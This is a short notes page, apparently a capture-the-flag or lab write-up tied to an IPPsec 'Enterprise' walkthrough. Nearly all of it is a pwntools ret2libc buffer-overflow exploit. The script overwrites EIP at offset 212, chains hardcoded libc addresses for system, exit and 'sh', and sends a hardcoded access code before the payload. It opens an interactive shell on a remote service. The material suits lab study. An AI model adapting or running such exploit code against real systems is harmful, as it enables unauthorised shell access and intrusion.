Reverse Engineering Shell

from pwn import *

context(os="linux",arch="i386")
HOST, PORT = "10.10.10.61", 32812

#EIP Overwirte @ 212

junk = "\x90" * 212

ret2libc = p32(0xf7e4c060) # System()    #(gdb) p system
ret2libc += p32(0xf7e3faf0) # Exit        #(gdb) p system
ret2libc += p32(0xf7f6ddd5) # sh          #(gdb) find &system,+99999,"sh"

payload = junk + ret2libc

r = remote(HOST, PORT)
r.recvuntil("Enter Bridge Access Code:")
r.sendline("picard1")
r.recvuntil("Waiting for input:")
r.sendline("4")
r.recvuntil("Enter Security Override:")
r.sendline(payload)
r.interactive()
r.recvuntil("")

references

IPPsec Enterprise

results matching ""

    No results matching ""